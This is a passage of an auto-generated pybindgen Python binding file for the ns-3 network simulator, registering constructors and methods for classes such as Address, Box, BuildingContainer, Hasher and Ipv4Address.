root_module['ns3::TwoRayGroundPropagationLossModel']) register_Ns3UniformDiscPositionAllocator_methods(root_module, root_module['ns3::UniformDiscPositionAllocator']) register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable']) register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable']) register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable']) register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable']) register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor']) register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker']) register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue']) register_Ns3BoxChecker_methods(root_module, root_module['ns3::BoxChecker']) register_Ns3BoxValue_methods(root_module, root_module['ns3::BoxValue']) register_Ns3Building_methods(root_module, root_module['ns3::Building']) register_Ns3BuildingsPropagationLossModel_methods(root_module, root_module['ns3::BuildingsPropagationLossModel']) register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker']) register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase']) register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue']) register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable']) register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable']) register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable']) register_Ns3EmptyAttributeAccessor_methods(root_module, root_module['ns3::EmptyAttributeAccessor']) register_Ns3EmptyAttributeChecker_methods(root_module, root_module['ns3::EmptyAttributeChecker']) register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue']) register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable']) register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable']) register_Ns3FixedRoomPositionAllocator_methods(root_module, root_module['ns3::FixedRoomPositionAllocator']) register_Ns3FixedRssLossModel_methods(root_module, root_module['ns3::FixedRssLossModel']) register_Ns3FriisPropagationLossModel_methods(root_module, root_module['ns3::FriisPropagationLossModel']) register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable']) register_Ns3GridBuildingAllocator_methods(root_module, root_module['ns3::GridBuildingAllocator']) register_Ns3GridPositionAllocator_methods(root_module, root_module['ns3::GridPositionAllocator']) register_Ns3HybridBuildingsPropagationLossModel_methods(root_module, root_module['ns3::HybridBuildingsPropagationLossModel']) register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker']) register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue']) register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker']) register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue']) register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker']) register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue']) register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker']) register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue']) register_Ns3ItuR1238PropagationLossModel_methods(root_module, root_module['ns3::ItuR1238PropagationLossModel']) register_Ns3ListPositionAllocator_methods(root_module, root_module['ns3::ListPositionAllocator']) register_Ns3LogDistancePropagationLossModel_methods(root_module, root_module['ns3::LogDistancePropagationLossModel']) register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable']) register_Ns3MatrixPropagationLossModel_methods(root_module, root_module['ns3::MatrixPropagationLossModel']) register_Ns3MobilityBuildingInfo_methods(root_module, root_module['ns3::MobilityBuildingInfo']) register_Ns3NakagamiPropagationLossModel_methods(root_module, root_module['ns3::NakagamiPropagationLossModel']) register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice']) register_Ns3NetDeviceQueue_methods(root_module, root_module['ns3::NetDeviceQueue']) register_Ns3NetDeviceQueueInterface_methods(root_module, root_module['ns3::NetDeviceQueueInterface']) register_Ns3Node_methods(root_module, root_module['ns3::Node']) register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable']) register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker']) register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue']) register_Ns3OhBuildingsPropagationLossModel_methods(root_module, root_module['ns3::OhBuildingsPropagationLossModel']) register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable']) register_Ns3QueueItem_methods(root_module, root_module['ns3::QueueItem'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue']) register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker']) register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue']) register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker']) register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue']) register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker']) register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue']) register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker']) register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue']) register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation']) register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a']) register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32']) register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64']) register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3']) return
## Bind ns3::Address (network module): comparison/output-stream operators,
## constructors, and the buffer copy / (de)serialization member functions.
def register_Ns3Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## address.h (module 'network'): ns3::Address::Address() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor] cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor] cls.add_constructor([param('ns3::Address const &', 'address')]) ## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function] cls.add_method('CheckCompatible', 'bool', [param('uint8_t', 'type'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyAllFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function] cls.add_method('CopyAllTo', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function] cls.add_method('CopyTo', 'uint32_t', [param('uint8_t *', 'buffer')], is_const=True) ## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'buffer')]) ## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function] cls.add_method('GetLength', 'uint8_t', [], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function] cls.add_method('IsInvalid', 'bool', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function] cls.add_method('IsMatchingType', 'bool', [param('uint8_t', 'type')], is_const=True) ## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function] cls.add_method('Register', 'uint8_t', [], is_static=True) ## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'buffer')], is_const=True) return
## Bind ns3::AttributeConstructionList: Add/Begin/End/Find over the list of
## attribute construction items.
def register_Ns3AttributeConstructionList_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function] cls.add_method('Add', 'void', [param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')]) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function] cls.add_method('Begin', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function] cls.add_method('End', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('Find', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True) return
## Bind ns3::AttributeConstructionList::Item: a plain record exposing the
## checker/name/value instance attributes.
def
register_Ns3AttributeConstructionListItem_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable] cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False) return
## Bind ns3::Box (mobility): an axis-aligned 3D box with intersection /
## closest-side / inside queries and xMin..zMax coordinate attributes.
def register_Ns3Box_methods(root_module, cls): cls.add_output_stream_operator() ## box.h (module 'mobility'): ns3::Box::Box(ns3::Box const & arg0) [copy constructor] cls.add_constructor([param('ns3::Box const &', 'arg0')]) ## box.h (module 'mobility'): ns3::Box::Box(double _xMin, double _xMax, double _yMin, double _yMax, double _zMin, double _zMax) [constructor] cls.add_constructor([param('double', '_xMin'), param('double', '_xMax'), param('double', '_yMin'), param('double', '_yMax'), param('double', '_zMin'), param('double', '_zMax')]) ## box.h (module 'mobility'): ns3::Box::Box() [constructor] cls.add_constructor([]) ## box.h (module 'mobility'): ns3::Vector ns3::Box::CalculateIntersection(ns3::Vector const & current, ns3::Vector const & speed) const [member function] cls.add_method('CalculateIntersection', 'ns3::Vector', [param('ns3::Vector const &', 'current'), param('ns3::Vector const &', 'speed')], is_const=True) ## box.h (module 'mobility'): ns3::Box::Side ns3::Box::GetClosestSide(ns3::Vector const & position) const [member function] cls.add_method('GetClosestSide', 'ns3::Box::Side', [param('ns3::Vector const &', 'position')], is_const=True) ## box.h (module 'mobility'): bool ns3::Box::IsInside(ns3::Vector const & position) const [member function] cls.add_method('IsInside', 'bool', [param('ns3::Vector const &', 'position')], is_const=True) ## box.h (module 'mobility'): ns3::Box::xMax [variable] cls.add_instance_attribute('xMax', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::xMin [variable] cls.add_instance_attribute('xMin', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::yMax [variable] cls.add_instance_attribute('yMax', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::yMin [variable] cls.add_instance_attribute('yMin', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::zMax [variable] cls.add_instance_attribute('zMax', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::zMin [variable] cls.add_instance_attribute('zMin', 'double', is_const=False) return
## Bind ns3::BuildingContainer (buildings): vector-like container of
## Ptr<Building> with Add/Begin/End/Create/Get/GetGlobal/GetN.
def register_Ns3BuildingContainer_methods(root_module, cls): ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer(ns3::BuildingContainer const & arg0) [copy constructor] cls.add_constructor([param('ns3::BuildingContainer const &', 'arg0')]) ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer() [constructor] cls.add_constructor([]) ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer(ns3::Ptr<ns3::Building> building) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Building >', 'building')]) ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer(std::string buildingName) [constructor] cls.add_constructor([param('std::string', 'buildingName')]) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Add(ns3::BuildingContainer other) [member function] cls.add_method('Add', 'void', [param('ns3::BuildingContainer', 'other')]) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Add(ns3::Ptr<ns3::Building> building) [member function] cls.add_method('Add', 'void', [param('ns3::Ptr< ns3::Building >', 'building')]) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Add(std::string buildingName) [member function] cls.add_method('Add', 'void', [param('std::string', 'buildingName')]) ## building-container.h (module 'buildings'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingContainer::Begin() const [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_const=True) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Create(uint32_t n) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n')]) ## building-container.h (module 'buildings'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingContainer::End() const [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_const=True) ## building-container.h (module 'buildings'): ns3::Ptr<ns3::Building> ns3::BuildingContainer::Get(uint32_t i) const [member function] cls.add_method('Get', 'ns3::Ptr< ns3::Building >', [param('uint32_t', 'i')], is_const=True) ## building-container.h (module 'buildings'): static ns3::BuildingContainer ns3::BuildingContainer::GetGlobal() [member function] cls.add_method('GetGlobal', 'ns3::BuildingContainer', [], is_static=True) ## building-container.h (module 'buildings'): uint32_t
ns3::BuildingContainer::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) return
## Bind ns3::BuildingList: static registry of all Building instances
## (Add/Begin/End/GetBuilding/GetNBuildings are all static).
def register_Ns3BuildingList_methods(root_module, cls): ## building-list.h (module 'buildings'): ns3::BuildingList::BuildingList() [constructor] cls.add_constructor([]) ## building-list.h (module 'buildings'): ns3::BuildingList::BuildingList(ns3::BuildingList const & arg0) [copy constructor] cls.add_constructor([param('ns3::BuildingList const &', 'arg0')]) ## building-list.h (module 'buildings'): static uint32_t ns3::BuildingList::Add(ns3::Ptr<ns3::Building> building) [member function] cls.add_method('Add', 'uint32_t', [param('ns3::Ptr< ns3::Building >', 'building')], is_static=True) ## building-list.h (module 'buildings'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingList::Begin() [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_static=True) ## building-list.h (module 'buildings'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingList::End() [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_static=True) ## building-list.h (module 'buildings'): static ns3::Ptr<ns3::Building> ns3::BuildingList::GetBuilding(uint32_t n) [member function] cls.add_method('GetBuilding', 'ns3::Ptr< ns3::Building >', [param('uint32_t', 'n')], is_static=True) ## building-list.h (module 'buildings'): static uint32_t ns3::BuildingList::GetNBuildings() [member function] cls.add_method('GetNBuildings', 'uint32_t', [], is_static=True) return
## Bind ns3::BuildingsHelper: static helpers to install building/mobility
## info on nodes and make mobility models consistent.
def register_Ns3BuildingsHelper_methods(root_module, cls): ## buildings-helper.h (module 'buildings'): ns3::BuildingsHelper::BuildingsHelper() [constructor] cls.add_constructor([]) ## buildings-helper.h (module 'buildings'): ns3::BuildingsHelper::BuildingsHelper(ns3::BuildingsHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::BuildingsHelper const &', 'arg0')]) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::Install(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('Install', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_static=True) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::Install(ns3::NodeContainer c) [member function] cls.add_method('Install', 'void', [param('ns3::NodeContainer', 'c')], is_static=True) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::MakeConsistent(ns3::Ptr<ns3::MobilityModel> bmm) [member function] cls.add_method('MakeConsistent', 'void', [param('ns3::Ptr< ns3::MobilityModel >', 'bmm')], is_static=True) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::MakeMobilityModelConsistent() [member function] cls.add_method('MakeMobilityModelConsistent', 'void', [], is_static=True) return
## Bind ns3::CallbackBase: type-erased callback holder; public GetImpl plus a
## protected constructor taking the implementation pointer.
def register_Ns3CallbackBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function] cls.add_method('GetImpl', 'ns3::Ptr< ns3::CallbackImplBase >', [], is_const=True) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')], visibility='protected') return
## Bind ns3::ConstantVelocityHelper (mobility): position/velocity bookkeeping
## with pause/unpause/update and bounded-update helpers.
def register_Ns3ConstantVelocityHelper_methods(root_module, cls): ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper(ns3::ConstantVelocityHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::ConstantVelocityHelper const &', 'arg0')]) ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper() [constructor] cls.add_constructor([]) ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper(ns3::Vector const & position) [constructor] cls.add_constructor([param('ns3::Vector const &', 'position')]) ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper(ns3::Vector const & position, ns3::Vector const & vel) [constructor] cls.add_constructor([param('ns3::Vector const &', 'position'), param('ns3::Vector const &', 'vel')]) ## constant-velocity-helper.h (module 'mobility'): ns3::Vector ns3::ConstantVelocityHelper::GetCurrentPosition() const [member function] cls.add_method('GetCurrentPosition', 'ns3::Vector', [], is_const=True) ## constant-velocity-helper.h (module 'mobility'): ns3::Vector ns3::ConstantVelocityHelper::GetVelocity() const [member function] cls.add_method('GetVelocity', 'ns3::Vector', [], is_const=True) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::Pause() [member function] cls.add_method('Pause', 'void', []) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::SetPosition(ns3::Vector const & position) [member function] cls.add_method('SetPosition', 'void', [param('ns3::Vector const &', 'position')]) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::SetVelocity(ns3::Vector const & vel) [member function] cls.add_method('SetVelocity', 'void', [param('ns3::Vector const &', 'vel')]) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::Unpause() [member function] cls.add_method('Unpause',
'void', []) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::Update() const [member function] cls.add_method('Update', 'void', [], is_const=True) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::UpdateWithBounds(ns3::Rectangle const & rectangle) const [member function] cls.add_method('UpdateWithBounds', 'void', [param('ns3::Rectangle const &', 'rectangle')], is_const=True) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::UpdateWithBounds(ns3::Box const & bounds) const [member function] cls.add_method('UpdateWithBounds', 'void', [param('ns3::Box const &', 'bounds')], is_const=True) return
## Bind ns3::Hasher: 32/64-bit hash front-end over a Hash::Implementation,
## with buffer and std::string overloads plus clear().
def register_Ns3Hasher_methods(root_module, cls): ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hasher const &', 'arg0')]) ## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor] cls.add_constructor([]) ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function] cls.add_method('GetHash32', 'uint32_t', [param('std::string const', 's')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function] cls.add_method('GetHash64', 'uint64_t', [param('std::string const', 's')]) ## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function] cls.add_method('clear', 'ns3::Hasher &', []) return
## Bind ns3::Ipv4Address: constructors, mask combination, (de)serialization
## and the IsAny/IsBroadcast/IsMulticast/... classification predicates.
def register_Ns3Ipv4Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor] cls.add_constructor([param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('CombineMask', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv4Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv4Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function] cls.add_method('GetBroadcast', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('GetSubnetDirectedBroadcast', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Address const &', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function] cls.add_method('IsLocalMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('IsSubnetDirectedBroadcast', 'bool', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) return def register_Ns3Ipv4Mask_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor] cls.add_constructor([param('uint32_t', 'mask')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor] cls.add_constructor([param('char const *', 'mask')]) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function] cls.add_method('GetInverse', 'uint32_t', [], 
